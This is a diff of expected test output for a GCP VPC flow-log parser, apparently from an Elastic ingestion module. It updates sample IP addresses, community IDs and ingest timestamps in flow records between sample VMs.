"{\"insertId\":\"bxuq05fhgmw9j\",\"jsonPayload\":{\"bytes_sent\":\"318481\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33564},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597223164Z\",\"packets_sent\":\"181\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866699945Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866699945Z", "end": "2019-06-14T03:49:59.597223164Z", @@ -14374,18 +14374,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 139359, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 70 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Zm3DkZJD/U+ewVlHMnyoA6QK9Do=", + "community_id": "1:h8J6a5Itbyk70zoisAG0nlUOW1s=", "bytes": 139359, "name": "default", "transport": "tcp", @@ -14407,7 +14407,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -14444,8 +14444,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868955900Z", - "original": "{\"insertId\":\"bxuq05fhgmw97\",\"jsonPayload\":{\"bytes_sent\":\"139359\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33874,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933323342Z\",\"packets_sent\":\"70\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510575555Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391978400Z", + "original": "{\"insertId\":\"bxuq05fhgmw97\",\"jsonPayload\":{\"bytes_sent\":\"139359\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33874,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933323342Z\",\"packets_sent\":\"70\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510575555Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510575555Z", "end": "2019-06-14T03:49:37.933323342Z", @@ -14472,17 +14472,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 60640, "bytes": 1461, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:NICAaeH22xLf7LP6W0kbWVQpWME=", + "community_id": "1:J26+Ln48KsAEVBqcU2DcbUsddkk=", "bytes": 1461, "transport": "tcp", "type": "ipv4", @@ -14496,7 +14496,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, @@ -14521,8 +14521,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868958800Z", - "original": "{\"insertId\":\"bxuq05fhgmw9i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":60640},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391982100Z", + "original": "{\"insertId\":\"bxuq05fhgmw9i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60640},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:42:50.830164366Z", "end": "2019-06-14T03:42:50.942543211Z", @@ -14545,9 +14545,9 @@ "as": { "number": 4837 }, - "address": "198.51.100.182", + "address": "67.43.156.14", "port": 41818, - "ip": "198.51.100.182" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -14561,7 +14561,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:+MSnEfQ6PdDGsHX0nTeNna2fZHI=", + "community_id": "1:iiFy+S+g1JJvu9kZvA1ivEiN2EM=", "bytes": 45, "transport": "tcp", "type": "ipv4", @@ -14576,7 +14576,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.182" + "67.43.156.14" ] }, "gcp": { @@ -14600,8 +14600,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868961700Z", - "original": "{\"insertId\":\"bxuq05fhgmw9c\",\"jsonPayload\":{\"bytes_sent\":\"45\",\"connection\":{\"dest_ip\":\"198.51.100.182\",\"dest_port\":41818,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:43:16.809366809Z\",\"packets_sent\":\"9\",\"reporter\":\"SRC\",\"rtt_msec\":\"1350\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:11.031370298Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391986700Z", + "original": "{\"insertId\":\"bxuq05fhgmw9c\",\"jsonPayload\":{\"bytes_sent\":\"45\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":41818,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:43:16.809366809Z\",\"packets_sent\":\"9\",\"reporter\":\"SRC\",\"rtt_msec\":\"1350\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:11.031370298Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:11.031370298Z", "end": "2019-06-14T03:43:16.809366809Z", @@ -14622,9 +14622,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 60640, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -14638,7 +14638,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:NICAaeH22xLf7LP6W0kbWVQpWME=", + "community_id": "1:J26+Ln48KsAEVBqcU2DcbUsddkk=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -14653,7 +14653,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { @@ -14677,8 +14677,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868964700Z", - "original": "{\"insertId\":\"bxuq05fhgmw9h\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":60640,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391990500Z", + "original": "{\"insertId\":\"bxuq05fhgmw9h\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60640,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:42:50.830164366Z", "end": "2019-06-14T03:42:50.942543211Z", @@ -14705,18 +14705,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 358920, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 61 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:xlcXy61NrJvVRyzBr1bsyzEWEv8=", + "community_id": "1:uTd+omrfPom0tjhwVM+taqHcEco=", "bytes": 358920, "name": "default", "transport": "tcp", @@ -14738,7 +14738,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -14772,8 +14772,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868967700Z", - "original": "{\"insertId\":\"bxuq05fhgmw92\",\"jsonPayload\":{\"bytes_sent\":\"358920\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33966,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"61\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510534141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391995300Z", + "original": "{\"insertId\":\"bxuq05fhgmw92\",\"jsonPayload\":{\"bytes_sent\":\"358920\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33966,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"61\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510534141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510534141Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -14800,18 +14800,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 53104, "bytes": 653827, "domain": "zeek-nsm", - "ip": "198.51.100.88", + "ip": "67.43.156.14", "packets": 286 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:EvU+L/cBE9vacReP+K7ey2MZ6Bs=", + "community_id": "1:TMH6IVeF6TnVWOY7cFvGCaCMaPY=", "bytes": 653827, "name": "default", "transport": "tcp", @@ -14833,7 +14833,7 @@ }, "related": { "ip": [ - "198.51.100.88", + "67.43.156.14", "10.139.99.242" ] }, @@ -14870,8 +14870,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868970600Z", - "original": "{\"insertId\":\"bxuq05fhgmw8u\",\"jsonPayload\":{\"bytes_sent\":\"653827\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"198.51.100.88\",\"src_port\":53104},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:45.312543839Z\",\"packets_sent\":\"286\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.188944581Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391999800Z", + "original": "{\"insertId\":\"bxuq05fhgmw8u\",\"jsonPayload\":{\"bytes_sent\":\"653827\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":53104},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:45.312543839Z\",\"packets_sent\":\"286\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.188944581Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.188944581Z", "end": "2019-06-14T03:49:45.312543839Z", @@ -14892,10 +14892,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -14909,7 +14909,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:xlcXy61NrJvVRyzBr1bsyzEWEv8=", + "community_id": "1:uTd+omrfPom0tjhwVM+taqHcEco=", "bytes": 5220, "name": "default", "transport": "tcp", @@ -14932,7 +14932,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -14965,8 +14965,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868973300Z", - "original": "{\"insertId\":\"bxuq05fhgmw9g\",\"jsonPayload\":{\"bytes_sent\":\"5220\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33966},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"81\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510534141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.392004Z", + "original": "{\"insertId\":\"bxuq05fhgmw9g\",\"jsonPayload\":{\"bytes_sent\":\"5220\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33966},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"81\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510534141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510534141Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -14993,18 +14993,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 31140, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 40 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:m8TzhysIkslBtL9JjV+tquk6V/g=", + "community_id": "1:KTuz6NE5trahWJ94CUsvoASfpt8=", "bytes": 31140, "name": "default", "transport": "tcp", @@ -15026,7 +15026,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -15060,8 +15060,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868976900Z", - "original": "{\"insertId\":\"bxuq05fhgmw91\",\"jsonPayload\":{\"bytes_sent\":\"31140\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33524,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461240929Z\",\"packets_sent\":\"40\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.789945697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.392008100Z", + "original": 